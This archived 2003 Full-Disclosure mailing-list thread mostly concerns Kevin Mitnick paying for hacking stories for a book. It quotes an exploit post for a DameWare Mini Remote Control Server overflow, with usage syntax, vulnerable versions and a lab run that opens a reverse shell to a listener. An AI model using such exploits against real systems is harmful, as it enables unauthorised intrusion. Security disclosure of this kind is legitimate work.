In that case you probably will want to update your site http://www.defthi.com/main/CallforHackers.html since it mentions another arangement
----- Original Message ----- From: "Kevin Mitnick" <[EMAIL PROTECTED]> To: "'Jelmer'" <[EMAIL PROTECTED]>; "'Adik'" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Saturday, December 20, 2003 1:56 AM Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit > The difference is that I'm offer a $500 for the best story of a single hack, > and I'm willing to pay $200 for each story that makes the final draft. > > Markoff would not agree to pay one dime. > > Cheers, > > Kevin Mitnick > > Check out http://www.zdnet.com.au for the story > > > -----Original Message----- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Jelmer > Sent: Friday, December 19, 2003 4:03 PM > To: Kevin Mitnick; 'Adik'; [EMAIL PROTECTED]; > [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control > Server Overflow Exploit > > If this is legit > > from a /. interview : > > --snip-- > John Markoff had first libeled me in his book, Cyperpunk, which he > co-authored with his former wife, Katie Hafner. In and around 1990, Markoff > and Hafner contacted me to request my participation for a book about three > hackers, including myself. In considering their request, I asked about their > budget to compensate me for my time and/or life story rights. Both Markoff > and Hafner were unwilling to compensate me as a source, because it was > unethical. I explained that it was unethical for me to give them my story > for free. We were at an impasse > --snip-- > > from the site : > > --snip-- > If your story makes it into the book, you'll receive a free copy of my first > book, The Art of Deception, plus a rare Advanced Reader's Copy of the new > one with your story in it -- both signed by me with a personal inscription > to you in your real name or your handle or pseudonym. > --snip-- > > Thats definatly more ethical ;) > > > ----- Original Message ----- > From: "Kevin Mitnick" <[EMAIL PROTECTED]> > To: "'Adik'" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; > <[EMAIL PROTECTED]> > Sent: Saturday, December 20, 2003 12:30 AM > Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control > Server Overflow Exploit > > > > Hi all! > > > > > > I'm sorry for my absence from the list for the past few months, but I have > > been very busy traveling outside the US, and my mail account was > > experiencing problems. Now that I am receiving the messages again, I have > > been playing "catch up," by reading the old posts. > > > > I do have some good news, and was hoping that some of you might be able to > > assist me. I have been commissioned by Wiley & Sons to write a second > book, > > which is tentatively titled, "The Art of Intrusion." This book will > > chronicle detailed accounts of real, untold hacks by the perpetrators who > > did it, and I will provide a security analysis and described how the > attack > > could be mitigated/prevented in today's environment. I am going to tell > the > > story from the perpetrator's stance, not just from research obtained from > > law enforcement officials and records. > > > > I am looking for former/retired hackers that would be willing to tell me > the > > details of their sexiest hack. I am not interested in the run-of-the-mill > > attacks such as, exploiting RPC DCOM, but rather creative ones that > > incorporated technical, physical and/or social engineering aspects. > > > > > > > > I am offering $500 for the most provocative story that makes it into the > > book, and if the person wishes, we can protect their anonymity by the use > of > > a handle. All contributors selected for the book, will receive a copy of > > both books autographed by the authors. > > > > I should have more information up on FreeKevin.com today, as well as > > DefensiveThinking.com. If someone would like to contact me with a story > or > > a possible lead on a storyteller, please write to me at > > [EMAIL PROTECTED], or call at (310)689-7229. I would appreciate > > any assistance you can offer. > > > > All my best, > > > > > > > > Kevin Mitnick > > > > -----Original Message----- > > From: [EMAIL PROTECTED] > > [mailto:[EMAIL PROTECTED] On Behalf Of Adik > > Sent: Friday, December 19, 2003 8:38 AM > > To: [EMAIL PROTECTED]; [EMAIL PROTECTED] > > Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server > > Overflow Exploit > > > > DameWare Mini Remote Control Server Exploit > > > > C:\xploits\dmware>dmware > > > > ...oO DameWare Remote Control Server Overflow Exploit Oo... > > > > -( by Adik netmaniac[at]hotmail.KG )- > > > > - Versions vulnerable: <= DWRCS 3.72.0.0 > > - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 > > > > Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort> > > eg: dmware 10.0.0.1 6129 10.0.0.2 21 > > > > > > C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53 > > > > ...oO DameWare Remote Control Server Overflow Exploit Oo... > > > > -( by Adik netmaniac[at]hotmail.KG )- > > > > - Versions vulnerable: <= DWRCS 3.72.0.0 > > - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 > > > > [*] Target IP: 192.168.63.130 Port: 6129 > > [*] Local IP: 192.168.63.1 Listening Port: 53 > > > > [*] Initializing sockets... [ OK ] > > [*] Binding to local port: 53... [ OK ] > > [*] Setting up a listener... [ OK ] > > > > OS Info : WIN2000 [ver 5.0.2195] > > SP String : Service Pack 3 > > > > EIP: 0x77db912b (advapi32.dll) > > > > [*] Constructing packet for WIN 2000 SP: 3... [ OK ] > > [*] Connecting to 192.168.63.130:6129... [ OK ] > > [*] Packet injected! > > [*] Connection request accepted: 192.168.63.130:1056 > > [*] Dropping to shell... > > > > Microsoft Windows 2000 [Version 5.00.2195] > > (C) Copyright 1985-2000 Microsoft Corp. > > > > C:\WINNT\system32>exit > > exit > > [x] Connection closed. > > > > C:\xploits\dmware> > > > > ------ > > cheerz, > > > > Adik > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
